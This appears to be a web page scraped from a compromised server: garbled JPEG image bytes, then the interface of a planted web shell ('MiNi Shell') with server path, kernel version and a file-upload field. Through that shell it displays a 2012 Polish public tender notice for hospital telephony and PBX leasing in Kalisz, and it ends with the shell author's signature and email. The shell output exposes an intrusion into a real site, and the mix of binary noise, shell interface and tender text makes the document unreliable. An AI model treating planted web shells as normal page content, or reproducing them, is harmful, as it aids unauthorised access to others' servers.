JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120327/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120327/70345-N-2012.html

<p class="kh_header"><b>Kalisz: Świadczenie usług telekomunikacyjnych wraz z dzierżawą centrali telefonicznej dla Wojewódzkiego Szpitala Zespolonego im. L. Perzyny w Kaliszu</b><br>
<b>Numer ogłoszenia: 70345 - 2012; data zamieszczenia: 27.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. Ludwika Perzyny w Kaliszu , ul. Poznańska 79, 62-800 Kalisz, woj. wielkopolskie, tel. 062 7651397, faks 062 7571323.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.kalisz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług telekomunikacyjnych wraz z dzierżawą centrali telefonicznej dla Wojewódzkiego Szpitala Zespolonego im. L. Perzyny w Kaliszu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy zakres zamówienia obejmuje:
1.   Świadczenie usług telekomunikacyjnych w zakresie połączeń przychodzących oraz wychodzących 
generowanych z numerów i na numery aktualnie użytkowane przez Zamawiającego, tj. 
a) połączenia telefoniczne lokalne (strefowe), międzystrefowe i do sieci telefonii ruchomej (komórkowej) oraz połączenia międzynarodowe,
b)  zapewnienie sekundowego naliczania opłat za usługi telekomunikacyjne bez opłaty inicjującej i opłat za niezrealizowane połączenia,
c)  zapewnienie transmisji dla faxu,
d)  połączenia do biura numerów,
e)  połączenia bezpłatne z automatycznymi serwisami, infoliniami (0-800, 0-801, 
     0-804) oraz z numerami alarmowymi do służb powołanych ustawowo do
     niesienia pomocy, posiadających numery skrócone,  
f)  Wykonawca zablokuje  możliwość połączeń Zamawiającego z numerami - 700
    oraz 300.
2.  Wykonawca zapewni możliwość bezpłatnych połączeń pomiędzy wszystkimi numerami telefonicznymi należącymi do Zamawiającego. Świadczenie usługi telekomunikacyjnej w zakresie tzw. połączeń wewnętrznych zostanie skalkulowane przez Wykonawcę w ramach jednorazowej opłaty startowej obejmującej kompleks budynków znajdujących się przy ul. Poznańskiej 79 i ul. Toruńskiej 7 w Kaliszu.   
3. Świadczenie usługi dostępu do internetu. 
    Wykonawca zobowiązany będzie do dostawy, montażu, uruchomienia i
    konfiguracji urządzeń tworzących zakończenie sieci (gniazda sieciowe).   
    Specyfikację urządzeń określi Protokół zadawczo-odbiorczy, który 
    jednocześnie stanowił będzie potwierdzenie prawidłowo wykonanych prac, o
    których mowa w zadaniu poprzednim. Gniazda sieciowe, przez okres 
    obowiązywania umowy, będą stanowiły własność Wykonawcy.
    Wymagania dotyczące usługi dostępu do internetu:
     Przyłącze nr 1:
     - prędkość pobierania danych: min 10 Mb/s
     - predkość wysyłania danych: min 4Mb/s
     - stałe adresy IP - 8 szt
    Przyłącze nr 2:
    - łącze symetryczne
    - prędkość pobierania danych: min 20 Mb/s
    - prędkość wysyłania danych min 20 Mb/s
    - stałe adresy IP- 8 szt.
Ze względu na czas trwania umowy na świadczenie usługi (48 miesięcy) Zamawiający przewidział w istotnych warunkach umowy (załącznik do SIWZ) możliwość zmiany parametrów dostarczanego internetu na korzystniejsze dla Zamawiającego. 
 4.  Dzierżawę fabrycznie nowej centrali telefonicznej ( w tym wyposażenia
      dodatkowego obejmującego m.in. oprogramowanie ), instalację oraz wdrożenie
      systemu komutacyjnego ( cyfrowej centrali telefonicznej ).
 5.  Świadczenie obsługi serwisowej obejmującej:
     -  całą obsługę systemu,
     -  zmiany programowe,
     -  sprzęt zastępczy w przypadku awarii,
     -  określony poniżej czas reakcji serwisu w przypadku awarii lub usterki
        systemu telekomunikacyjnego,
     -  okresową konserwację ( w tym, m.in. czyszczenie),
     -  coroczny przegląd techniczny, zgodnie z zaleceniami producenta.
       Wykonawca zobowiązany będzie do zapewnienia ciągłości pracy oferowanego systemu telekomunikacyjnego we wszystkie dni w roku, 24 godziny na dobę, przez cały okres obowiązywania umowy w sprawie zamówienia publicznego.
6.  Bezpłatne dostarczenie aparatów telefonicznych końcowych dla wszystkich użytkowanych przez Zamawiającego numerów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających dotychczasowemu Wykonawcy, polegających na powtórzeniu tego samego rodzaju zamówień, co opisane w SIWZ w okresie 3 lat od udzielenia zamówienia podstawowego.
Powyższe będzie miało zastosowanie w przypadku, gdy Zamawiający zamówi zwiększenie ilości linii wewnętrznych analogowych lub systemowych (do 8%). 
Zamówienia uzupełniające mogą stanowić nie więcej niż 2,10% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 64.20.00.00-8, 32.55.23.10-3, 32.55.13.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 10 000,00 PLN.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek posiadania niezbędnej wiedzy i doświadczenia, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie Wykonawca wykonał lub wykonuje co najmniej dwa zamówienia, których przedmiotem jest świadczenie usług telekomunikacyjnych 
 będących przedmiotem zamówienia o wartości minimum 130 000,00 PLN brutto (słownie: sto trzydzieści tysięcy złotych 00/100) każde zamówienie. Celem potwierdzenia spełnienia powyższego warunku Wykonawca musi załączyć do oferty wykaz usług jak wyżej, sporządzony w układzie tabelarycznym druk wykazu w załączeniu do siwz. 
Ocena spełnienia wyżej wymienionego warunku przez Wykonawców zostanie dokonana zgodnie z formułą spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach, których Zamawiający wymaga. Z treści załączonych dokumentów jednoznacznie musi wynikać, iż Wykonawca spełnia powyższy warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek dotyczący sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, jeżeli załączy do oferty opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o sumie gwarancyjnej nie niższej niż 
50 000,00 PLN .
Ocena spełnienia wyżej wymienionego warunku przez Wykonawców zostanie dokonana zgodnie z formułą spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach, których Zamawiający wymaga. Z treści załączonych dokumentów jednoznacznie musi wynikać, iż Wykonawca spełnia powyższy warunek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)   zaświadczenie o wpisie do rejestru przedsiębiorców telekomunikacyjnych wydane przez Prezesa Urzędu Komunikacji Elektronicznej, zgodnie z art. 10 ust. 1 ustawy z dnia 14 lipca 2004r. Prawo telekomunikacyjne (Dz.U. z 2004r., Nr 171, poz. 1800 z późn. zm.),
2)  materiały producenta, specyfikacja techniczna - dotyczące oferowanej centrali telefonicznej.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony i podpisany Formularz Ofertowy - druk w załączeniu do siwz,
2) wypełnione i podpisane Formularze Cenowe - druki w załączeniu do siwz,
3) dowód wniesienia wadium (w przypadku wnoszenia wadium w formie niepieniężnej kopie dokumentu należy wpiąć do oferty, a oryginał w osobnej koszulce dołączyć do oferty; w przypadku dokonania przelewu prosimy o ksero dowodu przelewu),
4) oświadczenie Wykonawcy, że m.in. zapoznał się z treścią niniejszej specyfikacji, załączonymi istotnymi postanowieniami umowy i akceptuje określone w nich warunki - druk w załączeniu do siwz,
5) wykaz sprzętu - centrala telefoniczna wraz z wyposażeniem dodatkowym i oprogramowania, będącegoprzedmiotem dzierżawy ( z podaniem informacji, m.in. typ centrali, nazwa producenta),
6) pełnomocnictwo do podpisania oferty - w przypadku gdy ofertę podpisuje osoba nie wymieniona w KRS (Dział 2) lub zaświadczeniu o wpisie do działalności gospodarczej do składania oświadczeń woli w imieniu Wykonawcy,
7) dokument ustanawiający pełnomocnika w przypadku składania oferty wspólnej (art. 23 ustawy),
8) oświadczenie Wykonawcy wskazujące, która część zamówienia zostanie powierzona Podwykonawcom - zgodnie z zapisami pkt Q SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Możliwości zmian umowy, jakie przewiduje Zamawiający, zgodnie z art. 144, ust. 1 ustawy Pzp:
Zamawiający przewiduje możliwość zmiany postanowień przyszłej umowy w stosunku do treści oferty, na podstawie której dokonany będzie wybór Wykonawcy, w sytuacji konieczności wprowadzenia takiej zmiany wynikającej z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub gdy zmiany te będą korzystne dla Zamawiającego , tj. dopuszcza się możliwość dokonania następujących zmian w umowie:
1)  zmianę wynagrodzenia Wykonawcy w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym: ustawowej stawki podatku od towarów i usług VAT, przy zachowaniu wynagrodzenia netto,
2)   w wypadku zmniejszenia kosztów świadczenia usług poniżej poziomu cen określonych przez Wykonawcę w ofercie: zmiana cenników, planów telefonicznych (dla klientów biznesowych, cenników promocji), ofert okresowych, itp.,
3)  zmianę parametrów internetu na parametry korzystniejsze dla Zamawiającego lub zmiany wynikające z aktualnie obowiązującego u Wykonawcy Regulaminu świadczenia usług (niniejsze zmiany zostaną wprowadzone o ile istnieją warunki techniczne dla zmiany parametrów usługi),
4)   zmianę terminu wykonania zamówienia w przypadku wystąpienia siły wyższej (siła wyższa - oznacza wydarzenie nieprzewidywalne i poza kontrolą stron niniejszej umowy występujące po podpisaniu umowy, a powodujące niemożliwość wywiązywania się z umowy w jej obecnym brzemieniu),
5)   zmianę danych Wykonawcy, np.: zmianę adresu, konta bankowego, osób kontaktowych, itp.
Warunkiem dokonania zmian wskazanych powyżej, w szczególności może być:
        a) konieczność ze względu na zmianę przepisów prawa,
        b) zmiana obowiązujących u Wykonawcy regulaminów świadczenia usług oraz cenników,
        c) wystąpienie siły wyższej,
        d) zmiana danych Wykonawcy.
W przypadku wystąpienia okoliczności stanowiących podstawę zmian postanowień umowy, strony umowy zobowiązane są do niezwłocznego, nie później niż 3 dni od zaistnienia wskazanych przyczyn poinformowania o tym fakcie drugą stronę i wystąpienia z wnioskiem o dokonanie zmian postanowień umowy w przedmiotowej zakresie. Jeżeli zmiana w umowie związana jest ze zmianą obowiązujących u 
Wykonawcy cenników lub regulaminów świadczenia usług Wykonawca zobowiązany jest do doręczenia Zamawiającemu treść każdej proponowanej zmiany warunków umowy z wyprzedzeniem co najmniej jednego okresu rozliczeniowego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.kalisz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Zamawiającego - Dział Zamówień Publicznych (kondygnacja III - pokój nr 16)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.04.2012 godzina 09:00, miejsce: Kancelaria Zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie przewiduje zawarcia umowy ramowej. Zamawiający nie przewiduje udzielenia zamówienia publicznego w dynamicznym systemie zakupów.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com